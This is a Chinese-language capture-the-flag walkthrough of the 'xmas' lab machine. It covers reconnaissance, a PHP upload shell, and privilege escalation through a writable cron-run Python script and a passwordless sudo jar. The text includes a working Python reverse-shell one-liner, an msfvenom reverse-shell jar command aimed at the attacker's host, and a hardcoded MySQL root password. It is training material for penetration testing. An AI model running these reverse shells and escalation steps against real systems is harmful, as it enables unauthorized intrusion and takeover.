【OSCP】xmas

OSCP 靶场

靶场介绍

xmas

easy

文件上传漏洞、进程分析、python 反弹shell、jar 包反弹shell

信息收集

主机发现

nmap -sn 192.168.31.175

需要添加dns

端口扫描

└─# nmap -sV -A -p- -T4 192.168.31.175
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 04:27 EST
Nmap scan report for 192.168.31.175
Host is up (0.00060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a6:3e:0b:65:85:2c:0c:5e:47:14:a9:dd:aa:d4:8c:60 (ECDSA)
|_  256 99:72:b5:6e:1a:9e:70:b3:24:e0:59:98:a4:f9:d1:25 (ED25519)
80/tcp open  http    Apache httpd 2.4.55
|_http-title: Did not follow redirect to http://christmas.hmv
|_http-server-header: Apache/2.4.55 (Ubuntu)
MAC Address: 08:00:27:B1:AE:10 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt     -u http://christmas.hmv/ -x php,html,txt -e 

权限获取

这里直接上传php 文件

上传成功后，执行如下，我们为了方便操作反弹一个shell

权限提升

查看passwd 发现存在多个账号，但是都没有权限。

上传linpeas.sh 扫描发现nice_or_naughty.py 脚本可写入

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files                                                                                                                                                           
/dev/mqueue
/dev/shm
/opt/NiceOrNaughty/nice_or_naughty.py
/run/apache2/socks
/run/lock
/run/lock/apache2
/run/screen

再上传pspy64 查看进程，发现存在定时任务，uid 为1000

2024/02/09 10:08:01 CMD: UID=1000 PID=27592  | /usr/bin/python3 /opt/NiceOrNaughty/nice_or_naughty.py 
2024/02/09 10:08:01 CMD: UID=1000 PID=27591  | /bin/sh -c /usr/bin/python3 /opt/NiceOrNaughty/nice_or_naughty.py 

www-data@xmas:/opt/NiceOrNaughty$ cat nice_or_naughty.py
cat nice_or_naughty.py
import mysql.connector
import random
import os

# Check the wish lists directory
directory = "/var/www/christmas.hmv/uploads"
# Connect to the mysql database christmas
mydb = mysql.connector.connect(
    host="localhost",
    user="root",
    password="ChristmasMustGoOn!",
    database="christmas"
)

#Read the names of the wish list
def read_names(directory):
    for filename in os.listdir(directory):
        full_path = os.path.join(directory, filename)
        if os.path.isfile(full_path):
            name, ext = os.path.splitext(filename)
            if any(char.isalnum() for char in name):
                status = random.choice(["nice", "naughty"])
                #print(f"{name} {status}")
                insert_data(name, status)
                os.remove(full_path)
            else:
                pass
        
        elif os.path.isdir(full_path):
            pass 

# Insert name into the database
def insert_data(name, status):
    mycursor = mydb.cursor()
    sql = "INSERT INTO christmas (name, status) VALUES ( %s, %s)"
    val = (name, status)
    mycursor.execute(sql, val)
    mydb.commit()

#Generate printable Nice and Naughty list
def generate_lists():
    mycursor = mydb.cursor()

    # SQL query to fetch all names and status
    mycursor.execute("SELECT name, status FROM christmas")

    # Separate the nice and naughty lists
    nice_list = []
    naughty_list = []

    for (name, status) in mycursor:
        if status == "nice":
            nice_list.append(name)
        else:
            naughty_list.append(name)
    
    parent_directory = os.path.dirname(os.getcwd())
    file_path = "/home/alabaster/nice_list.txt"
    # Save the nice and naughty lists to separate txt files
    with open(file_path, "w") as file:
        for name in nice_list:
            file.write(f"{name}n")
    file_path = "/home/alabaster/naughty_list.txt"
    with open(file_path, "w") as file:
        for name in naughty_list:
            file.write(f"{name}n")

read_names(directory)
generate_lists()

写入python 反弹shell

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.181",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' > nice_or_naughty.py

成功提权到alabaster用户权限

sudo -l 可以看到 sudo /usr/bin/java -jar /home/alabaster/PublishList/PublishList.jar不需要密码就可以运行

alabaster@xmas:~$ sudo -l
sudo -l
Matching Defaults entries for alabaster on xmas:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
    use_pty

User alabaster may run the following commands on xmas:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /usr/bin/java -jar /home/alabaster/PublishList/PublishList.jar
alabaster@xmas:~$ 

那么接下来我们使用msfvenom 生成反弹jar 包反弹shell

msfvenom -p java/shell_reverse_tcp LHOST=192.168.31.181 LPORT=8989 -f jar -o shell.jar

接着我们使用kali 开启web，下载到执行的目录下，然后替换成PublishList.jar 包的名字

php -S 0.0.0.0:12345

最后执行，成功反弹shell，提权到root权限

End

“点赞、在看与分享都是莫大的支持”

原文始发于微信公众号（贝雷帽SEC）：【OSCP】xmas